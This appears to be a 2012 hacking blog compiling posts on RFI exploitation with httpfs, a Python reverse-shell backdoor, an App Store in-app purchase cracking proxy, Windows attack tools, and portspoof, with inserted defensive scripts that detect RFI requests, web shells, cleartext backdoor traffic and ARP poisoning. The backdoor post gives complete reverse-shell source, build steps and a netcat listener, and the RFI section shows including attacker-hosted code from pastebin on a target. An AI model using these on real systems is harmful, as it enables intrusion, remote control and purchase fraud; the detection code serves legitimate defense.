Aug 9, 2012

Penetration testing with httpfs: RFI


As every system administrator knows, mounting a remote filesystem with protocols like sshfs or smbfs saves time and simplifies interaction with remote machines. This convenience is usually not available when remote access is limited, for example when managing a web shell or during a web application penetration test.

If you are familiar with those situations, httpfs can help you mount a remote filesystem locally, relying on a script (a PHP file, for instance) installed on the target web server. This FUSE filesystem, written by Andrea Cardaci and me, is the next indispensable tool for your toolkit.

Basic usage
Just generate the server-side script (PHP in this case), upload it to the target machine and mount the remote location locally. Let's see the single steps:

1. Download the httpfs archive or clone the source code from GitHub.
2. Compile and install it as described in the README file.
3. Generate the PHP script:
$ httpfs generate php > httpfs.php

4. Upload the generated script to an accessible location inside the document root of the target web server. In the next paragraphs we will see some penetration testing techniques to run the httpfs PHP code by exploiting file inclusion vulnerabilities.

5. Mount remote location locally:
$ httpfs mount http://target.com/httpfs.php /tmp/httpfs/

*** If you don't have enough privileges to access the system root '/', append as last parameter a remote folder to mount as base directory:
$ httpfs mount http://target.com/httpfs.php /tmp/httpfs/ /home/john

6. Browse your pretty awesome new mount point (the one given to httpfs mount in step 5):
$ cd /tmp/httpfs
$ ls
bin cdrom etc initrd.img lib lost+found mnt proc run selinux sys usr vmlinuz
boot dev home initrd.img.old lib64 media opt root sbin srv tmp var vmlinuz.old


Exploiting file inclusion

Remote file inclusion is a common vulnerability that forces a vulnerable PHP web application to execute attacker-supplied PHP code. A typical exploitable PHP script contains:

<?php
include($_GET['page']);
?>
Let's exploit RFI to execute the httpfs server-side PHP code and achieve remote filesystem mounting.

1. Verify the RFI vulnerability by opening a web-accessible resource through the vulnerable script:

$ curl http://target.com/fi.php?page="http://www.google.com"

2. By default the PHP option "allow_url_fopen" is off, which disables opening HTTP and FTP URLs: in those cases try the LFI attack described at the bottom.

3. Generate the httpfs server-side script as described in the previous paragraph.
4. Upload the generated PHP script to an HTTP-reachable site, such as http://pastebin.com or something faster.
5. Run httpfs, using as URL the vulnerable page with the location of the generated script as the included resource:
$ mkdir /tmp/mounted
$ httpfs mount http://target.com/fi.php?page="http://pastebin.com/raw.php?i=XFYwGCK0" /tmp/mounted


6. Browse the remote filesystem through the local mount point:
$ cd /tmp/mounted
$ ls
bin cdrom etc initrd.img lib lost+found mnt proc run selinux sys usr vmlinuz
boot dev home initrd.img.old lib64 media opt root sbin srv tmp var vmlinuz.old

7. When an application is prone to a file inclusion vulnerability but does not allow opening HTTP or FTP remote URLs, it is still possible to inject our code with techniques like /proc/self/environ or log poisoning.

httpfs will soon be included in Weevely as an automatic installation module; meanwhile, enjoy this complete stand-alone version.
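From the defender's side, every request in this post leaves a recognisable trace in the web server access log: an include parameter carrying a URL, a /proc/self/environ path, a log file path, a traversal sequence, a null byte or a php:// wrapper. The following Python script is an added example (it is not part of the original post and not httpfs code) that scans constructed common-log-format lines for those patterns; the parameter names in INCLUDE_PARAMS, the sample lines and the indicator names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Common log format: client IP, two dashes (ident/user), timestamp, quoted request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Assumption: parameter names that applications commonly hand to include()/require().
INCLUDE_PARAMS = {"page", "file", "include", "path", "template", "module"}

# Each indicator is matched against the URL-decoded parameter value.
INDICATORS = [
    ("remote-url", re.compile(r"^(https?|ftps?)://", re.I)),          # RFI over HTTP/FTP
    ("php-wrapper", re.compile(r"^(php|data|expect|phar)://", re.I)), # stream wrappers
    ("proc-environ", re.compile(r"/proc/self/environ")),              # LFI via environ
    ("log-file", re.compile(r"/(var/log|logs?)/.*(access|error)", re.I)),  # log poisoning
    ("traversal", re.compile(r"\.\./|\.\.\\")),                        # directory traversal
    ("null-byte", re.compile(r"\x00")),                                # %00 truncation
]

# Constructed sample log (not real traffic): one benign include, four attack variants,
# one unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Aug/2012:10:00:01 +0000] "GET /fi.php?page=about HTTP/1.1" 200 512
10.0.0.7 - - [09/Aug/2012:10:00:02 +0000] "GET /fi.php?page=http://example.com/shell.txt HTTP/1.1" 200 2048
10.0.0.7 - - [09/Aug/2012:10:00:03 +0000] "GET /fi.php?page=/proc/self/environ HTTP/1.1" 200 1024
10.0.0.9 - - [09/Aug/2012:10:00:04 +0000] "GET /fi.php?page=../../../../var/log/apache2/access.log%00 HTTP/1.1" 200 9000
10.0.0.9 - - [09/Aug/2012:10:00:05 +0000] "GET /fi.php?page=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 700
10.0.0.3 - - [09/Aug/2012:10:00:06 +0000] "GET /index.php?id=7 HTTP/1.1" 200 300
"""


def analyze_line(line):
    """Return a finding dict when an include parameter looks malicious, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    # parse_qsl URL-decodes values, so %00 becomes a real NUL byte here.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() not in INCLUDE_PARAMS:
            continue
        hits = [label for label, rx in INDICATORS if rx.search(value)]
        if hits:
            return {"ip": m.group("ip"), "param": name, "value": value, "indicators": hits}
    return None


def scan_log(text):
    """Apply analyze_line to every line and keep the findings in log order."""
    return [f for f in (analyze_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["param"], ", ".join(f["indicators"]), repr(f["value"]))
```

Pointing scan_log at a real access log is enough to get a first triage list; the value is decoded before matching so encoded variants of the same payload are caught as well.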


Source: http://disse.cting.org/2012/07/27/penetration-testing-with-httfs-rfi/


If you like my blog, Please Donate Me

Web Shell Detector - To find and identify php shells

If you want to see all options, please go to the Source.

Web Shell Detector is a PHP script that helps you find and identify PHP/CGI (Perl)/ASP/ASPX shells. Web Shell Detector has a "web shells" signature database that helps to identify a "web shell" with up to 99% accuracy. By using the latest JavaScript and CSS technologies, Web Shell Detector has a lightweight and friendly interface.

Detection: Number of known shells: 290

Requirements: PHP 5.x, OpenSSL

Usage: To activate Web Shell Detector:
1) Upload shelldetect.php and shelldetect.db to your root directory
2) Open the shelldetect.php file in your browser. Example: http://www.website.com/shelldetect.php
3) Inspect all strange files; if some files look suspicious, send them to the http://www.websecure.co.il team. After submitting your file, it will be inspected and, if there is any threat, it will be inserted into the "Web Shell Detector" web shells signature database.
4) If any web shells are found and identified, use your FTP/SSH client to remove them from your web server (IMPORTANT: please be careful, because some shells may be integrated into system files!).

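To make the signature-database idea concrete, here is an added Python example of the same approach (it is not Web Shell Detector's own code and does not use shelldetect.db): a handful of constructed regular-expression signatures for typical web shell constructs, applied to every script under a web root. The signature list, the set of scanned extensions and the sample files it writes into a temporary directory are all assumptions.

```python
import os
import re
import shutil
import tempfile

# Constructed signatures (assumption: modelled on common web shell constructs).
SIGNATURES = [
    ("eval-of-decoded-payload",
     re.compile(rb"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("command-execution-from-request",
     re.compile(rb"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("dynamic-function-from-request",
     re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I)),
    ("preg_replace-eval-modifier",
     re.compile(rb"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I)),
]

# Only server-side script types are scanned; everything else is skipped.
SCAN_EXTENSIONS = {".php", ".phtml", ".php5", ".inc", ".cgi", ".pl", ".asp", ".aspx"}


def scan_file(path):
    """Return the names of every signature that matches the file's contents."""
    with open(path, "rb") as fh:
        data = fh.read()
    return [name for name, rx in SIGNATURES if rx.search(data)]


def scan_tree(root):
    """Walk a web root and map each flagged file (path relative to root) to its signatures."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in sorted(files):
            if os.path.splitext(fn)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, fn)
            hits = scan_file(path)
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


# Constructed sample files: one clean page, three shell-like scripts, one non-script.
SAMPLE_FILES = {
    "index.php": b"<?php echo 'hello'; ?>",
    "uploads/img.php": b"<?php eval(base64_decode($_POST['c'])); ?>",
    "tools/cmd.php": b"<?php if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>",
    "lib/old.php": b"<?php $_REQUEST['f']($_REQUEST['a']); ?>",
    "notes.txt": b"system($_GET['x'])",  # not a scanned extension, so never reported
}


def build_sample_webroot():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root


def remove_sample_webroot(root):
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    root = build_sample_webroot()
    try:
        for rel, hits in sorted(scan_tree(root).items()):
            print(rel, "->", ", ".join(hits))
    finally:
        remove_sample_webroot(root)
```

Signature matching of this kind finds known constructs quickly but misses obfuscated or novel shells, which is why a tool like the one above asks for suspicious samples to grow its database; pairing it with file integrity monitoring of the document root closes part of that gap.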

Aug 8, 2012

Create Custom Backdoor With Python

1. Go to the pyInstaller folder inside your Python folder.

2. Copy this source code into the Python path as shell.py:

#!/usr/bin/python
# Reverse shell: connects back to the listener and runs each received line through the system shell.

import subprocess, socket

host = "your hacker ip"   # address of the listening machine
port = 443                # listening port, as an integer (matches "nc -l -p 443" in step 4)

connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connection.connect((host, port))
connection.send("You're in shell")

while 1:
    command = connection.recv(1024)
    if command == "quit":
        break

    # run the command through the shell and collect both stdout and stderr
    proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, stdin=subprocess.PIPE)

    stdoutput = proc.stdout.read() + proc.stderr.read()

    connection.send(stdoutput)

connection.send("Bye bye")
connection.close()

3. Build the executable:
- python Configure.py
- python Makespec.py --onefile --noconsole shell.py
- python Build.py shell\shell.spec

4. Use netcat to wait for the connection:
- nc -l -p 443

5. Find a way to send the shell executable from shell/.

6. Have fun.
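A network-level way to notice this kind of backdoor: it connects to port 443, where a genuine TLS client would begin with a ClientHello, but it sends a cleartext banner and then receives commands in the clear. The following Python example is added here (it is not part of the original post) and classifies a flow by the first bytes the client sends to port 443; the sample flows, including the TLS record prefix and the TEST-NET addresses, are constructed.

```python
import string

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"CONNECT ")
PRINTABLE = frozenset(string.printable.encode())


def looks_like_tls_client_hello(data):
    """True when the bytes open a TLS handshake record (content type 0x16, version 3.x)
    whose first handshake message is a ClientHello (type 0x01 at offset 5)."""
    return (len(data) >= 6 and data[0] == 0x16 and data[1] == 0x03
            and data[2] <= 0x04 and data[5] == 0x01)


def printable_ratio(data):
    """Share of printable ASCII bytes; close to 1.0 means readable text, not ciphertext."""
    if not data:
        return 0.0
    return sum(1 for b in data if b in PRINTABLE) / len(data)


def classify_flow(flow):
    """Classify a TCP flow by what the client sent first on port 443.
    Returns "other-port", "tls", "http-on-443" or "cleartext-on-443"."""
    if flow["dport"] != 443:
        return "other-port"
    first = flow["client_first"]
    if looks_like_tls_client_hello(first):
        return "tls"
    if first.startswith(HTTP_METHODS):
        return "http-on-443"   # plain HTTP on the HTTPS port: a misconfiguration, not a shell
    return "cleartext-on-443"


def triage(flows):
    """Return (severity, "src->dst", verdict, evidence) for each flow that is not normal TLS."""
    alerts = []
    for f in flows:
        verdict = classify_flow(f)
        if verdict in ("other-port", "tls"):
            continue
        severity = "high" if verdict == "cleartext-on-443" else "low"
        evidence = "client=%r server=%r printable=%.2f" % (
            f["client_first"][:32], f["server_first"][:32], printable_ratio(f["client_first"]))
        alerts.append((severity, "%s->%s" % (f["src"], f["dst"]), verdict, evidence))
    return alerts


# Constructed sample flows: the first bytes each side sent. Flow 1 starts with a TLS 1.0
# record header carrying a ClientHello; flow 2 mirrors the backdoor above (cleartext
# greeting out, a command back); flow 3 is plain HTTP on 443; flow 4 is not on 443.
SAMPLE_FLOWS = [
    {"src": "10.0.0.12", "dst": "203.0.113.10", "dport": 443,
     "client_first": bytes.fromhex("160301009c0100009803034f"),
     "server_first": bytes.fromhex("160303003d0200003903")},
    {"src": "10.0.0.12", "dst": "198.51.100.7", "dport": 443,
     "client_first": b"You're in shell", "server_first": b"whoami\n"},
    {"src": "10.0.0.15", "dst": "10.0.0.2", "dport": 443,
     "client_first": b"GET / HTTP/1.1\r\nHost: intranet\r\n\r\n",
     "server_first": b"HTTP/1.1 400 Bad Request\r\n"},
    {"src": "10.0.0.12", "dst": "10.0.0.3", "dport": 22,
     "client_first": b"SSH-2.0-OpenSSH_5.9\r\n", "server_first": b"SSH-2.0-OpenSSH_5.9\r\n"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_FLOWS):
        print(*alert)
```

The check needs only the first packet of payload in each direction, so it can run on a flow record or a short packet capture rather than on full content; an egress rule that allows port 443 only to destinations that actually speak TLS is the matching preventive control.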


Aug 7, 2012

iAPCracker - AppStore in-app purchasing algorithms

If you want to download the app, please go to the Source.

in-app-proxy

This code allows you to emulate AppStore in-app purchasing algorithms.

Setup environment

You need UNIX and DNSMasq running with this configuration:
server=/ax.init.itunes.apple.com/8.8.8.8
server=/itunes.apple.com/8.8.8.8
server=/ets.gameloft.com/8.8.8.8
server=/vgold.gameloft.com/8.8.8.8
server=/itunes.com/8.8.8.8
address=/.itunes.apple.com/91.224.160.136
address=/edgesuite.net/91.224.160.136
address=/api.textnow.me/127.0.0.1
address=/warspark.com/127.0.0.1
address=/gameloft.com/91.224.160.136
address=/receipts.jamiesrecipes.zolmo.com/127.0.0.1
address=/popcap.com/127.0.0.1
address=/digitalchocolate.com/127.0.0.1
address=/beeblex.com/127.0.0.1
address=/highnoon.happylatte.com/127.0.0.1
address=/dc.full-fat.com/91.224.160.136
address=/mobile.ext.terrhq.ru/91.224.160.136
address=/api.tapsonic.co.kr/127.0.0.1
address=/bubble.teamlava.com/127.0.0.1
address=/csrrun.naturalmotion.com/127.0.0.1
address=/testflightapp.com/127.0.0.1
You also need nginx (or Apache) with PHP as a module or CGI, and these extensions: php-curl, pecl_http, php-xml.
Note that pecl_http needs to be built from source, so install php-pear, php-dev and gcc.
Next, configure the virtual hosts: one with the certificate and key itcert.pem and itcert.key (or generate your own) listening on *.itunes.apple.com on port 443; one listening on *.itunes.apple.com on port 80; pucert.cer, the purchase receipt certificate, with a key length of 1024; one listening on * on port 443 for developer server emulation; and one listening on * on port 80 for developer server emulation.
Rewrite everything to iapcracker.php on *.itunes.apple.com, and everything to index.php on *.
Here is an example for nginx:
if (!-e $request_filename) { rewrite ^/(.*)$ /iapcracker.php?URL=$1 last; break; } 

Source: https://github.com/ZonD80/in-app-proxy



Portspoof - service signature obfuscator


If you want to download it, please go to the Source.



The portspoof program is designed to enhance OS security through emulation of legitimate service signatures on otherwise closed ports. It is meant to be a lightweight, fast, portable and secure addition to any firewall system or security infrastructure.
The general goal of the program is to make the port scanning process (Nmap/Unicornscan/etc.) slow and its output very difficult to interpret, thus making the attack reconnaissance phase a challenging and bothersome task.
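The principle fits in a few dozen lines of Python. What follows is an added example, not portspoof's own code and not its signature database: a decoy listener that answers every connection with a deterministic, service-like greeting, optionally after a delay so that each probed port costs the scanner wall-clock time. The greeting strings are made up, and the function names and parameters are assumptions.

```python
import socket
import threading
import time

# Constructed greetings that imitate common services (assumption: not portspoof's signatures).
SIGNATURES = [
    b"220 mail.example.internal ESMTP Postfix\r\n",
    b"SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1\r\n",
    b"220 (vsFTPd 2.3.5)\r\n",
    b"HTTP/1.1 200 OK\r\nServer: Apache/2.2.22 (Ubuntu)\r\nContent-Length: 0\r\n\r\n",
    b"* OK [CAPABILITY IMAP4rev1] Dovecot ready.\r\n",
]


def banner_for(port):
    """Choose the fake greeting for a port deterministically, so repeated scans see a
    stable 'service' instead of a different answer each time."""
    return SIGNATURES[port % len(SIGNATURES)]


def start_decoy(host="127.0.0.1", port=0, delay=0.0):
    """Listen on host:port (0 = ephemeral) and answer every connection with a fake banner.
    Returns (listening socket, bound port); pass the socket to stop_decoy() to shut down."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(16)
    bound_port = srv.getsockname()[1]

    def loop():
        while True:
            try:
                conn, _peer = srv.accept()
            except OSError:
                return                  # listening socket was shut down
            with conn:
                time.sleep(delay)       # the stall is what slows a sequential scanner
                try:
                    conn.sendall(banner_for(bound_port))
                except OSError:
                    pass                # scanner closed early; nothing to do

    threading.Thread(target=loop, daemon=True).start()
    return srv, bound_port


def stop_decoy(srv):
    """Wake the accept() in the background thread and close the listening socket."""
    try:
        srv.shutdown(socket.SHUT_RDWR)
    except OSError:
        pass
    srv.close()


def grab_banner(port, host="127.0.0.1", timeout=3.0):
    """Connect the way a banner grabber does and return whatever greeting arrives."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(1024)


if __name__ == "__main__":
    srv, port = start_decoy()
    try:
        print("decoy on port %d replies: %r" % (port, grab_banner(port)))
    finally:
        stop_decoy(srv)
```

Run against all unused ports (for instance by redirecting them to the decoy with a firewall rule, as portspoof does), every closed port looks open and the scanner's service table fills with plausible but false entries; the delay parameter turns that into a time cost as well.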



Source: http://portspoof.duszynski.eu/


Windows Hacking Toolset

APE: ARP Poisoning Engine is a tool to poison the ARP cache of computers that are connected to the same LAN segment.
ARPGun: ARPGun is a tool to poison the ARP cache of a target computer that is connected to the same LAN segment. You define the network interface and the target system's IP address, and ARPGun sends the poisoned ARP packets to it to cut off its way to the Internet.
DNSHijack: DNSHijack is a simple and straightforward tool to send faked DNS replies back to a client system. If DNSHijack answers the request faster than the DNS server, the requesting client will keep the spoofed IP address in its DNS cache.
HTTPReverseProxy: HTTPReverseProxy is a simple and straightforward HTTP reverse proxy server written in C#. When started, it listens on the regular HTTP port, waits for incoming requests and forwards them to the server defined in the Host header of the HTTP request. But instead of just forwarding requests, it is also possible to modify the request itself or the responses sent back by the real web server. This is quite handy if you want to sniff data (like user names or passwords) that is protected by HTTPS.
HTTPSReverseProxy: HTTPSReverseProxy is an HTTPS reverse proxy server written in C#. When started, it listens on the regular HTTPS port (443), waits for incoming requests and forwards them to the server defined in the Host header of the HTTP request. But instead of just forwarding requests, it is also possible to modify the request itself or the responses sent back by the real web server.
IPAccounting: IPAccounting is a tool to analyze and monitor incoming/outgoing IP traffic.
TCPForward: TCPForward is a tool that, as its name says, allows forwarding TCP connections on a specific port.
TCPGun (under development): TCPGun is a tool that sniffs and manipulates TCP connections. The user can take over a session and inject data or reset the connections according to the configured BPF string.
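For the ARP cache poisoning tools at the top of the list, the defender's counterpart is to watch the ARP cache for changes. The following Python example is added here (it is not from the toolset or its source) and compares two snapshots in the format of Windows arp -a output, flagging an IP whose MAC changed between snapshots (highest severity for the gateway) and a MAC that now answers for several IPs. The snapshots, the addresses and the severity labels are constructed.

```python
import re

# One "arp -a" entry: IP, MAC (dash- or colon-separated), entry type.
ARP_ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})\s+(\w+)", re.I)


def parse_arp_table(text):
    """Return {ip: mac} for dynamic entries; static broadcast/multicast rows are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_ENTRY.match(line)
        if m and m.group(3).lower() == "dynamic":
            table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table


def compare_snapshots(before, after, gateway=None):
    """Alerts for IPs whose MAC changed and for MACs that claim more than one IP."""
    alerts = []
    for ip, mac in after.items():
        old = before.get(ip)
        if old is not None and old != mac:
            severity = "high" if ip == gateway else "medium"
            alerts.append((severity, "%s moved from %s to %s" % (ip, old, mac)))
    ips_by_mac = {}
    for ip, mac in after.items():
        ips_by_mac.setdefault(mac, []).append(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            alerts.append(("medium", "%s answers for %s" % (mac, ", ".join(sorted(ips)))))
    return alerts


# Constructed snapshots. In the second one the gateway's entry now carries the MAC of
# the host 192.168.1.20, which is what a poisoning tool on that host would produce.
SNAPSHOT_BEFORE = """\
Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.20          00-aa-bb-cc-dd-20     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

SNAPSHOT_AFTER = """\
Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-aa-bb-cc-dd-20     dynamic
  192.168.1.20          00-aa-bb-cc-dd-20     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

if __name__ == "__main__":
    before = parse_arp_table(SNAPSHOT_BEFORE)
    after = parse_arp_table(SNAPSHOT_AFTER)
    for severity, message in compare_snapshots(before, after, gateway="192.168.1.1"):
        print(severity.upper(), message)
```

A scheduled task that stores the previous arp -a output and feeds both snapshots to compare_snapshots gives a cheap host-side alarm; static ARP entries for the gateway, or dynamic ARP inspection on the switch, are the preventive measures this detection complements.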


Source: http://www.megapanzer.com/2012/08/06/windows-hacking-toolset/
